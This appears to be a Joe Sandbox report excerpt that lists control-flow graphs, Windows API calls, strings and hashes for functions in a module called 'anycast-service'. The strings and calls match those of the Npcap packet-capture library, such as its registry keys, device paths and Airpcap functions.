                                                                                                                              control_flow_graph 275 7ff8b8013240-7ff8b801327c 276 7ff8b80133ff-7ff8b801341f GetProcessHeap HeapAlloc 275->276 277 7ff8b8013282-7ff8b801328c 275->277 280 7ff8b801342e-7ff8b801343c 276->280 281 7ff8b8013421-7ff8b8013429 GetLastError 276->281 278 7ff8b8013292-7ff8b80132aa OpenSCManagerW 277->278 279 7ff8b8013374-7ff8b80133a5 RegOpenKeyExA 277->279 283 7ff8b80132b9-7ff8b80132e2 RegOpenKeyExA 278->283 284 7ff8b80132ac-7ff8b80132b4 GetLastError 278->284 279->276 282 7ff8b80133a7-7ff8b80133d9 RegQueryValueExA 279->282 286 7ff8b8013440-7ff8b8013447 280->286 285 7ff8b8013850-7ff8b8013856 SetLastError 281->285 287 7ff8b80133e8 282->287 288 7ff8b80133db-7ff8b80133e6 282->288 291 7ff8b8013349-7ff8b801334f GetLastError 283->291 292 7ff8b80132e4-7ff8b801330b RegCloseKey OpenServiceA 283->292 290 7ff8b801335a-7ff8b801336c SetLastError 284->290 289 7ff8b8013858-7ff8b801387e call 7ff8b8016290 285->289 286->286 293 7ff8b8013449-7ff8b8013451 286->293 295 7ff8b80133eb-7ff8b80133f8 RegCloseKey 287->295 288->287 288->295 290->279 294 7ff8b8013351-7ff8b8013354 CloseServiceHandle 291->294 292->291 297 7ff8b801330d-7ff8b801331c QueryServiceStatus 292->297 298 7ff8b801346d-7ff8b8013475 call 7ff8b80181d0 293->298 299 7ff8b8013453-7ff8b801346b call 7ff8b8011050 293->299 294->290 295->276 303 7ff8b80133fa call 7ff8b8012370 295->303 304 7ff8b801331e-7ff8b8013322 297->304 305 7ff8b8013324-7ff8b8013334 StartServiceW 297->305 307 7ff8b801347a-7ff8b8013498 298->307 299->307 303->276 304->305 309 7ff8b801333e-7ff8b8013347 CloseServiceHandle 304->309 305->309 310 7ff8b8013336-7ff8b801333c GetLastError 305->310 311 7ff8b801349e-7ff8b80134b6 call 7ff8b80181d0 307->311 312 7ff8b80135df-7ff8b8013606 CreateFileA 307->312 309->294 310->309 319 7ff8b80134b8-7ff8b80134bd 311->319 320 7ff8b80134c2-7ff8b80134e0 SetNamedPipeHandleState 311->320 314 7ff8b8013609-7ff8b801360d 312->314 316 7ff8b8013832-7ff8b8013838 GetLastError 314->316 317 7ff8b8013613-7ff8b8013617 314->317 318 7ff8b801383a-7ff8b801384e GetProcessHeap HeapFree 316->318 321 7ff8b8013619-7ff8b801361e 317->321 322 7ff8b8013620-7ff8b801363a CreateEventW 317->322 318->285 323 7ff8b80135c6-7ff8b80135dd SetLastError * 2 319->323 324 7ff8b80134ef-7ff8b80134fa 320->324 325 7ff8b80134e2-7ff8b80134ea GetLastError 320->325 326 7ff8b8013691-7ff8b80136a5 SetLastError GetLastError 321->326 327 7ff8b801363c-7ff8b8013644 GetLastError 322->327 328 7ff8b8013646-7ff8b801367a DeviceIoControl 322->328 323->314 332 7ff8b8013500-7ff8b8013509 324->332 325->323 326->318 331 7ff8b80136ab-7ff8b80136b1 CloseHandle 326->331 327->326 329 7ff8b801367c-7ff8b801368f GetLastError CloseHandle 328->329 330 7ff8b80136b6-7ff8b80136e5 328->330 329->326 333 7ff8b80136ff-7ff8b8013739 DeviceIoControl 330->333 334 7ff8b80136e7-7ff8b80136fa SetLastError GetLastError 330->334 331->318 332->332 335 7ff8b801350b-7ff8b8013528 WriteFile 332->335 337 7ff8b801373b-7ff8b8013751 GetLastError SetLastError GetLastError 333->337 338 7ff8b8013756-7ff8b801376b SetLastError 333->338 336 7ff8b80137df-7ff8b80137f8 SetLastError 334->336 339 7ff8b801352a-7ff8b8013532 GetLastError 335->339 340 7ff8b8013540-7ff8b8013562 ReadFile 335->340 345 7ff8b8013800-7ff8b801380a 336->345 337->336 343 7ff8b801376d-7ff8b8013780 SetLastError GetLastError 338->343 344 7ff8b8013782-7ff8b80137bb DeviceIoControl 338->344 339->323 341 7ff8b8013564-7ff8b801356f GetLastError 340->341 342 7ff8b8013575-7ff8b801357b 340->342 341->340 346 7ff8b8013571-7ff8b8013573 341->346 347 7ff8b801357d-7ff8b80135b3 call 7ff8b8012070 SetLastError 342->347 348 7ff8b80135c1 342->348 349 7ff8b80137dd 343->349 350 7ff8b80137bd-7ff8b80137d3 GetLastError SetLastError GetLastError 344->350 351 7ff8b80137d5-7ff8b80137d7 SetLastError 344->351 352 7ff8b801380c-7ff8b8013812 345->352 353 7ff8b801381f-7ff8b8013830 345->353 346->323 347->314 357 7ff8b80135b5-7ff8b80135bf SetLastError 347->357 348->323 349->336 350->349 351->349 352->353 354 7ff8b8013814-7ff8b801381d 352->354 353->289 354->345 354->353 357->314
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$Close$HandleService$HeapOpen$ControlCreateDeviceFileProcessQuery$AllocEventFreeManagerNamedPipeStartStateStatusValueWrite
                                                                                                                              • String ID: $h!$%p,%lu$AdminOnly$Dh!$NPCAP$SYSTEM\CurrentControlSet\Services\NPCAP$SYSTEM\CurrentControlSet\Services\NPCAP\Parameters$\\.\Global\%s
                                                                                                                              • API String ID: 3995143121-2509040173
                                                                                                                              • Opcode ID: 24e859fa9b75d91a825ce95dd926074e0ba4cfdd78f72e22ee0ffb1bf90c1440
                                                                                                                              • Instruction ID: 815020954282888258c18945d069758f2cb10d5a19d84de816bb7cd104069ad0
                                                                                                                              • Opcode Fuzzy Hash: 24e859fa9b75d91a825ce95dd926074e0ba4cfdd78f72e22ee0ffb1bf90c1440
                                                                                                                              • Instruction Fuzzy Hash: 6F024F31A08B82C6EF109B6AE44427A63A1FB487E4F514636EB5E037E4DF7CE55B8704
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8012C20 Relevance: 66.7, APIs: 24, Strings: 14, Instructions: 157synchronizationCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastMutexRelease$DirectoryObjectSingleSystemWait
                                                                                                                              • String ID: AirpcapClose$AirpcapFreeDeviceList$AirpcapGetDeviceList$AirpcapGetLastError$AirpcapGetLinkType$AirpcapGetMacAddress$AirpcapGetReadEvent$AirpcapGetStats$AirpcapOpen$AirpcapRead$AirpcapSetFilter$AirpcapSetKernelBuffer$AirpcapSetMinToCopy$AirpcapWrite
                                                                                                                              • API String ID: 3658661177-104291522
                                                                                                                              • Opcode ID: bb9623f2b2bc96bfda9d8198116ddd4dfd0b2d0500c0e5ac4e78fb2a5474714d
                                                                                                                              • Instruction ID: a5fd5341b1ace31ed961cf942bc067031ff7ddb054793c469b2c8c11edbb92d7
                                                                                                                              • Opcode Fuzzy Hash: bb9623f2b2bc96bfda9d8198116ddd4dfd0b2d0500c0e5ac4e78fb2a5474714d
                                                                                                                              • Instruction Fuzzy Hash: F491AE24A88A4785EF269B1EE8583B523A1BF8D7D4F440535DB4E462E4DF7CA18BC248
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80156F0 Relevance: 61.6, APIs: 32, Strings: 3, Instructions: 307memoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 707 7ff8b80156f0-7ff8b801572c 708 7ff8b8015730 call 7ff8b80128a0 707->708 709 7ff8b8015735-7ff8b801573b 708->709 710 7ff8b801573d-7ff8b801574a SetLastError 709->710 711 7ff8b801574f 709->711 712 7ff8b8015937-7ff8b801595a call 7ff8b8016290 710->712 713 7ff8b8015752 call 7ff8b8013240 711->713 715 7ff8b8015757-7ff8b801575d 713->715 717 7ff8b801578f-7ff8b80157c4 715->717 718 7ff8b801575f-7ff8b801578a GetLastError GetProcessHeap HeapFree SetLastError 715->718 719 7ff8b80157cd-7ff8b8015809 DeviceIoControl 717->719 720 7ff8b80157c6-7ff8b80157cb 717->720 718->712 721 7ff8b801580b-7ff8b8015811 GetLastError 719->721 722 7ff8b801585f-7ff8b8015871 SetLastError 719->722 723 7ff8b8015813-7ff8b801582d SetLastError GetLastError 720->723 721->723 726 7ff8b8015876 call 7ff8b80128a0 722->726 724 7ff8b801582f-7ff8b8015852 GetProcessHeap HeapFree SetLastError 723->724 725 7ff8b8015857-7ff8b801585a 723->725 727 7ff8b801592f 724->727 728 7ff8b8015919-7ff8b801592d GetProcessHeap HeapFree 725->728 729 7ff8b801587b-7ff8b8015881 726->729 727->712 728->727 729->728 730 7ff8b8015887-7ff8b8015898 729->730 731 7ff8b80158a1-7ff8b80158a8 730->731 731->731 732 7ff8b80158aa-7ff8b80158d5 call 7ff8b8015bc0 call 7ff8b8015d30 731->732 737 7ff8b8015905-7ff8b8015913 GetProcessHeap HeapFree 732->737 738 7ff8b80158d7-7ff8b80158e9 732->738 737->728 739 7ff8b80158eb-7ff8b80158fe 738->739 740 7ff8b8015900 call 7ff8b801666c 738->740 739->740 741 7ff8b801595b-7ff8b80159aa call 7ff8b801dff8 739->741 740->737 745 7ff8b80159ae call 7ff8b80128a0 741->745 746 7ff8b80159b3-7ff8b80159b9 745->746 747 7ff8b80159bb-7ff8b80159c8 SetLastError 746->747 748 7ff8b80159cd 746->748 749 7ff8b8015b66-7ff8b8015b8a call 7ff8b8016290 747->749 750 7ff8b80159d0 call 7ff8b8013240 748->750 751 7ff8b80159d5-7ff8b80159d8 750->751 753 7ff8b80159da-7ff8b80159f0 751->753 754 7ff8b8015a45-7ff8b8015a70 GetLastError GetProcessHeap HeapFree SetLastError 751->754 756 7ff8b80159f9-7ff8b8015a35 DeviceIoControl 753->756 757 7ff8b80159f2-7ff8b80159f7 753->757 754->749 759 7ff8b8015a75-7ff8b8015a9c SetLastError 756->759 760 7ff8b8015a37-7ff8b8015a3d GetLastError 756->760 758 7ff8b8015a3f SetLastError 757->758 758->754 761 7ff8b8015aa0 call 7ff8b80128a0 759->761 760->758 762 7ff8b8015aa5-7ff8b8015aab 761->762 763 7ff8b8015b48-7ff8b8015b5e GetProcessHeap HeapFree 762->763 764 7ff8b8015ab1-7ff8b8015acb 762->764 763->749 765 7ff8b8015ad0-7ff8b8015ad7 764->765 765->765 766 7ff8b8015ad9-7ff8b8015b04 call 7ff8b8015bc0 call 7ff8b8015d30 765->766 771 7ff8b8015b34-7ff8b8015b42 GetProcessHeap HeapFree 766->771 772 7ff8b8015b06-7ff8b8015b18 766->772 771->763 773 7ff8b8015b1a-7ff8b8015b2d 772->773 774 7ff8b8015b2f call 7ff8b801666c 772->774 773->774 775 7ff8b8015b8b-7ff8b8015ba7 call 7ff8b801dff8 773->775 774->771 779 7ff8b8015ba9-7ff8b8015bb0 775->779 780 7ff8b8015bb1-7ff8b8015bb3 775->780
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$ErrorLast$Process$Free$_invalid_parameter_noinfo_noreturn$Alloc
                                                                                                                              • String ID: $h!$\Device\NPCAP\$\Device\NPCAP\WIFI_
                                                                                                                              • API String ID: 1853143307-3732061985
                                                                                                                              • Opcode ID: 78600feb1f17d0dc0193d2b10318dcf2c2549d393ce05a0c562717b2e7ea6a60
                                                                                                                              • Instruction ID: cf7ed31b2a3264f026aee5671f84b7e234f6ef4a27c59a90c30d22b068731168
                                                                                                                              • Opcode Fuzzy Hash: 78600feb1f17d0dc0193d2b10318dcf2c2549d393ce05a0c562717b2e7ea6a60
                                                                                                                              • Instruction Fuzzy Hash: 19C16031A08B8286EF10AB6AE45436A7761FB89BE0F544235EB6E077E5DF3CD4478704
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8011110 Relevance: 56.3, APIs: 29, Strings: 3, Instructions: 284synchronizationnetworkCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 885 7ff8b8011110-7ff8b8011156 call 7ff8b8011050 888 7ff8b8011158-7ff8b801115a 885->888 889 7ff8b801115f-7ff8b8011183 WaitForSingleObject 885->889 890 7ff8b8011582-7ff8b801159b call 7ff8b8016290 888->890 891 7ff8b80111aa-7ff8b80111ba call 7ff8b8013240 889->891 892 7ff8b8011185 889->892 900 7ff8b80111bc-7ff8b80111cb ReleaseMutex 891->900 901 7ff8b80111e4-7ff8b8011211 GetProcessHeap HeapAlloc 891->901 893 7ff8b8011190-7ff8b80111a0 call 7ff8b801dcf4 892->893 905 7ff8b80111d0-7ff8b80111df ReleaseMutex 893->905 906 7ff8b80111a2-7ff8b80111a8 893->906 902 7ff8b801157a 900->902 903 7ff8b8011213-7ff8b801121c 901->903 904 7ff8b8011276-7ff8b80112b7 call 7ff8b801afd8 901->904 902->890 907 7ff8b801122d-7ff8b801122f 903->907 908 7ff8b801121e-7ff8b801122b 903->908 916 7ff8b80112c0-7ff8b80112c9 904->916 905->902 906->891 906->893 910 7ff8b8011231-7ff8b8011248 SetEvent CloseHandle * 2 907->910 911 7ff8b8011262-7ff8b8011271 ReleaseMutex 907->911 914 7ff8b801124e-7ff8b801125c GetProcessHeap HeapFree 908->914 910->914 915 7ff8b8011572 911->915 914->911 915->902 916->916 917 7ff8b80112cb-7ff8b80112f3 WideCharToMultiByte 916->917 918 7ff8b80112fd-7ff8b8011320 917->918 919 7ff8b80112f5 917->919 920 7ff8b8011332-7ff8b8011370 DeviceIoControl 918->920 921 7ff8b8011322-7ff8b8011330 SetLastError 918->921 919->918 923 7ff8b801137a-7ff8b801137c SetLastError 920->923 924 7ff8b8011372-7ff8b8011378 GetLastError 920->924 922 7ff8b8011382-7ff8b80113b0 921->922 925 7ff8b80113c1-7ff8b80113c3 922->925 926 7ff8b80113b2-7ff8b80113bf 922->926 923->922 924->923 927 7ff8b80113c5-7ff8b80113dc SetEvent CloseHandle * 2 925->927 928 7ff8b80113f6-7ff8b80113f9 925->928 930 7ff8b80113e2-7ff8b80113f0 GetProcessHeap HeapFree 926->930 927->930 931 7ff8b80113fb-7ff8b801141e GetProcessHeap HeapFree ReleaseMutex 928->931 932 7ff8b8011423-7ff8b8011431 928->932 930->928 933 7ff8b801155a-7ff8b801156a 931->933 934 7ff8b8011433-7ff8b8011442 call 7ff8b801a940 932->934 935 7ff8b8011447-7ff8b8011456 932->935 933->915 934->935 937 7ff8b801145c-7ff8b801146c 935->937 938 7ff8b8011531-7ff8b8011558 ReleaseMutex 935->938 939 7ff8b8011470-7ff8b8011495 GetProcessHeap HeapAlloc 937->939 938->933 940 7ff8b801149b-7ff8b80114cd call 7ff8b801a940 939->940 941 7ff8b8011521-7ff8b8011529 939->941 944 7ff8b801159c-7ff8b80115a1 940->944 945 7ff8b80114d3-7ff8b80114f7 htonl 940->945 941->938 946 7ff8b8011621-7ff8b8011627 944->946 947 7ff8b80115a3-7ff8b80115b7 944->947 948 7ff8b80114fb-7ff8b801151b 945->948 947->948 949 7ff8b80115bd-7ff8b80115ce 947->949 948->939 948->941 950 7ff8b80115d4-7ff8b80115d7 949->950 951 7ff8b80115d9-7ff8b80115e1 950->951 952 7ff8b80115e3-7ff8b80115fc htons 950->952 953 7ff8b80115ff-7ff8b8011610 951->953 952->953 953->950 954 7ff8b8011612-7ff8b801161c 953->954 954->948
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MutexRelease$ObjectSingleWaithtons
                                                                                                                              • String ID: $h!$%s%s$\Device\NPCAP\
                                                                                                                              • API String ID: 1474675544-224549409
                                                                                                                              • Opcode ID: fde2b859f1657c27ae3e75dd0427bd897eae5cd5d290e370dc25e074a9b5e6de
                                                                                                                              • Instruction ID: 96178a93c5d92584526b3046362316876dfd17c1a955eca4727bd952b36b9cae
                                                                                                                              • Opcode Fuzzy Hash: fde2b859f1657c27ae3e75dd0427bd897eae5cd5d290e370dc25e074a9b5e6de
                                                                                                                              • Instruction Fuzzy Hash: 45D12832A08B82C6EB50AF6AE4482AA73A5FB89BD4F455035EB4D47794DF3CD447C708
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8012370 Relevance: 45.7, APIs: 18, Strings: 8, Instructions: 175sleepmemoryfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$File$CurrentProcess$AllocateAttributesCheckCloseCreateExecuteFreeHandleInitializeMembershipModuleNameShellSleepToken
                                                                                                                              • String ID: %s %d$.exe$@$NpcapHelper$\\.\pipe\%s$npcap-%d$p$runas
                                                                                                                              • API String ID: 1962968878-1309257561
                                                                                                                              • Opcode ID: 17ef780c636fe9d08d0cfdfb354b647a8c895f27f5e7b315af7c225dd73af73d
                                                                                                                              • Instruction ID: 11dec73e0246bdd5db084766ef33dcff3b6d26faa69d66b7da390745f701ad3a
                                                                                                                              • Opcode Fuzzy Hash: 17ef780c636fe9d08d0cfdfb354b647a8c895f27f5e7b315af7c225dd73af73d
                                                                                                                              • Instruction Fuzzy Hash: B5914032A48B8286EB20DF65E8842AA3364FB483D8F400235EB5D16AE5DF3CD557C744
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8016E9C Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3140674995-0
                                                                                                                              • Opcode ID: e67599f071dbb878a9bc954f173f01348e76255b9f898742ea8016134fee3323
                                                                                                                              • Instruction ID: 1460b9779ca36679ab93b83f8f8d5a0297eb1f02dfb14062acd7146dd8d5efb4
                                                                                                                              • Opcode Fuzzy Hash: e67599f071dbb878a9bc954f173f01348e76255b9f898742ea8016134fee3323
                                                                                                                              • Instruction Fuzzy Hash: 36316D72609A81CAEF609F65E8403EA7364FB887D4F444039EB4D47A94DF3CD64AC714
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B801DDC4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1239891234-0
                                                                                                                              • Opcode ID: 8f960c8a6e8fcba5dea01ce8cba2acbbc0bbcaf7592e8c9aafc81e26dee506ed
                                                                                                                              • Instruction ID: 83fb325e52a9fbf407531035b71721d2f56cec14aa0e632b54649b6e32589f24
                                                                                                                              • Opcode Fuzzy Hash: 8f960c8a6e8fcba5dea01ce8cba2acbbc0bbcaf7592e8c9aafc81e26dee506ed
                                                                                                                              • Instruction Fuzzy Hash: 39313D36618B818ADB609B29E8402AE73A4FB897E9F500135EB9D43B94DF3CD547CB04
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B802DC88 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1443284424-0
                                                                                                                              • Opcode ID: 2a90809df871d4eaeb9a1cd9a5406bcda12a7960d08b3c890fdd79e3097f954a
                                                                                                                              • Instruction ID: 8db35b41fbaf4e9ca4af184de62a4cd4aa56dc0a887f6b94c59d73df760e85ec
                                                                                                                              • Opcode Fuzzy Hash: 2a90809df871d4eaeb9a1cd9a5406bcda12a7960d08b3c890fdd79e3097f954a
                                                                                                                              • Instruction Fuzzy Hash: 9FE1CB62A08A818AEB01CF6994801AE7BB1FB457D8F104136EF4E57B99DF78D85BC704
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8013970 Relevance: 56.3, APIs: 29, Strings: 3, Instructions: 313memorysynchronizationCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 781 7ff8b8013970-7ff8b80139b7 call 7ff8b8012c20 784 7ff8b80139b9-7ff8b80139bc 781->784 785 7ff8b8013a14-7ff8b8013a51 call 7ff8b80128a0 WaitForSingleObject 781->785 786 7ff8b80139c0-7ff8b80139c9 784->786 792 7ff8b8013a53-7ff8b8013a62 call 7ff8b8011da0 785->792 793 7ff8b8013a64-7ff8b8013a72 call 7ff8b801dcf4 785->793 786->786 788 7ff8b80139cb-7ff8b80139e9 GetProcessHeap HeapAlloc 786->788 790 7ff8b80139fb-7ff8b8013a11 call 7ff8b8011050 788->790 791 7ff8b80139eb-7ff8b80139f6 SetLastError 788->791 790->785 794 7ff8b8013d70-7ff8b8013d9b call 7ff8b8016290 791->794 792->793 803 7ff8b8013a81-7ff8b8013a93 call 7ff8b8011b10 792->803 804 7ff8b8013a7c-7ff8b8013a7f 793->804 805 7ff8b8013a74-7ff8b8013a7a 793->805 813 7ff8b8013ab0-7ff8b8013abe call 7ff8b801dcf4 803->813 814 7ff8b8013a95-7ff8b8013aa4 call 7ff8b8011da0 803->814 804->803 806 7ff8b8013ad7-7ff8b8013ae0 804->806 805->793 805->804 809 7ff8b8013c06-7ff8b8013c09 806->809 810 7ff8b8013ae6-7ff8b8013aed 806->810 815 7ff8b8013c0b-7ff8b8013c0e 809->815 816 7ff8b8013c13-7ff8b8013c15 809->816 811 7ff8b8013b49-7ff8b8013b51 810->811 812 7ff8b8013aef-7ff8b8013b0f GetProcessHeap HeapAlloc 810->812 819 7ff8b8013cfd-7ff8b8013d0d ReleaseMutex 811->819 812->811 817 7ff8b8013b11-7ff8b8013b33 812->817 834 7ff8b8013ac8-7ff8b8013acb 813->834 835 7ff8b8013ac0-7ff8b8013ac6 813->835 831 7ff8b8013acd-7ff8b8013ad2 814->831 832 7ff8b8013aa6 814->832 815->819 820 7ff8b8013c21-7ff8b8013c2b 816->820 821 7ff8b8013c17-7ff8b8013c1c 816->821 838 7ff8b8013b35-7ff8b8013b43 GetProcessHeap HeapFree 817->838 839 7ff8b8013b56-7ff8b8013b5f 817->839 823 7ff8b8013d0f-7ff8b8013d1d GetProcessHeap HeapFree 819->823 824 7ff8b8013d23-7ff8b8013d26 819->824 826 7ff8b8013c34-7ff8b8013c3b 820->826 821->819 823->824 828 7ff8b8013d28-7ff8b8013d36 GetProcessHeap HeapFree 824->828 829 7ff8b8013d3c-7ff8b8013d3f 824->829 826->826 833 7ff8b8013c3d-7ff8b8013c6b call 7ff8b8015bc0 call 7ff8b8015d30 